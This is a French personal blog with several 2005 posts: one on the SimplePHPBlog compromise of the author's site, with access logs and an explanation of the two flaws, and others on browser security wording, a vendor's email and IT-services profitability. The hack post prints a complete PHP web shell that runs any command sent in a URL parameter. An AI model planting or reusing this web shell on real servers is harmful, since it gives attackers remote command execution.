Une suggestion d'un vendeur de logiciels à qui une démonstration est demandée:

Let's not built a demo/technical proof.
This is time-consuming and does most of the times not require buy-in from the customer.
Let's convince them on logical differentiators.
I suggest that you contact the responsible pre-sales engineer <snip> in order to provide you with logical, convincing ammunition.

Certain qu'avec des munitions pareilles, le secteur va sortir de l'artisanat ...

La faille

Une faille de sécurité connue a été utilisée contre le site principal de SimplePHPBlog le 3 septembre 2005.
Ensuite un grand nombre de blogs utilisant SimplePHPBlog ont été piratés dans les jours suivants (ce qui se traduit ici par ce message à conserver en souvenir).

Les visiteurs venus d'ailleurs

Deux visites, le 4 septembre puis le 7 septembre:

weblog.bajoit.net 82.231.77.60 - - [04/Sep/2005:03:20:10 +0200] "GET /install00.php HTTP/1.1" 200 9355
weblog.bajoit.net 213.240.239.4 - - [07/Sep/2005:23:03:30 +0200] "GET /install00.php HTTP/1.1" 200 9388

Comment ça marche?

Une première faille permettait d'effacer un fichier créé lors de l'installation, de manière à forcer une nouvelle exécution des scripts d'installation. Il était alors possible de créer un nouvel utilisateur qui pouvait par exemple ajouter un message (ou pire).

Une seconde faille permettait d'importer (en tant que nouveau gestionnaire) comme image un fichier exécutable, qui pouvait à son tour accéder au serveur via PHP.

Un bon exemple:

<?php
$cmd = $_GET['cmd'];
echo '<hr/><pre>';
echo 'Command: ' . $cmd;
echo '</pre><hr/><br>';

echo '<pre>';
$last_line = system($cmd,$output);
echo '</pre><hr/>';
?>.

Mais dans ce cas précis, les commandes PHP trop dangereuses sont désactivées chez PHPNET.

Pourquoi?

Beaucoup d'utilisateurs se demandent ou est le problème: qualité, open-source, système basé sur des fichiers texte?
En tout cas, la publication de la faille a beaucoup aidé les pirates, et malgré tout il vaut mieux publier les failles que de les garder secrètes.
Et une version corrigée 4 jours après le problème ce n'est pas aussi bien que Mozilla (qui a été capable de publier la version résistante à une faille en moins de 24 heures) mais ce n'est pas mal!

WTF? that's just a hack.

La meilleure signification

Dans cette discussion de Michal Zalewski à propos de l'évaluation des différents navigateurs disponibles, on peut voir un beau mélange de significations du mot anglais secure :

• sécurisé : le navigateur a une architecture dans laquelle la sécurité est un aspect extrêmement important, il ne va pas divulguer des informations confidentielles à l'insu de l'utilisateur, il ne va pas exécuter des programmes non désirés par l'utilisateur, il va encourager les bonnes pratiques en matière de sécurité,
• fiable : le navigateur ne comporte pas trop de bugs, bloquants ou non bloquants,
• fiable dans des conditions extrêmes : ne se bloque pas sur des cas qui se trouvent en dehors des conditions habituelles ('tiny, razor-sharp shards of malformed HTML').

Sur la base de ce dernier point (et passant sous silence ses mauvaises prestations pour les deux premiers), Internet Explorer est présenté comme bien plus secure que ses concurrents : un peu léger ...

Trop cher

Avec comme arguments principaux une faible rentabilité et le coût du travail moins élevés chez les voisins, Agoria, la fédération multisectorielle de l'industrie technologique, qualifie de décevants les derniers accords interprofessionnels.

Mauvaise piste

Pas très nettes ces excuses: je vois par contre d'autres raisons fondamentales pour cette faible rentabilité, du moins dans le domaine des services informatiques:

• Prises de risques : Plus que jamais, les entreprises de services acceptent des projets au forfait dans des conditions de visibilité technologique et métier trop peu maîtrisées,
• Flexibilité : Pas de commande extraordinaire ou d'inventaire saisonnier dans ce secteur: simplement des projets qui dérapent et des promesses trop rapides. Reste une seule solution: heures supplémentaires, si possible discrètement, sans concertation ni publicité. Avec un peu de chance, l'employé ne les déclarera même pas, sinon on peut toujours corriger son détail de prestations par après.
• Les vrais concurrents : La concurrence ne vient pas d'Allemagne ou de France, elle est en Belgique, avec les mêmes normes. Les offres comportant des développement à moindre coût (Espagne, Grèce, Inde) ne montrent pas un taux de rentabilité bien élevé, surtout quand on recommence le projet ... en Belgique.
• Gestion du personnel : Des managers connaissant le domaine et tenant leurs promesses: rien de plus pour motiver son personnel. Quant aux stages de développement personnel ou psychothérapies sauvages, c'est bon, au second degré, pour entendre ses collègues les plus réceptifs adopter un vocabulaire psy pendant quelques mois.

Alors, 2005, meilleur ou pire que 2004?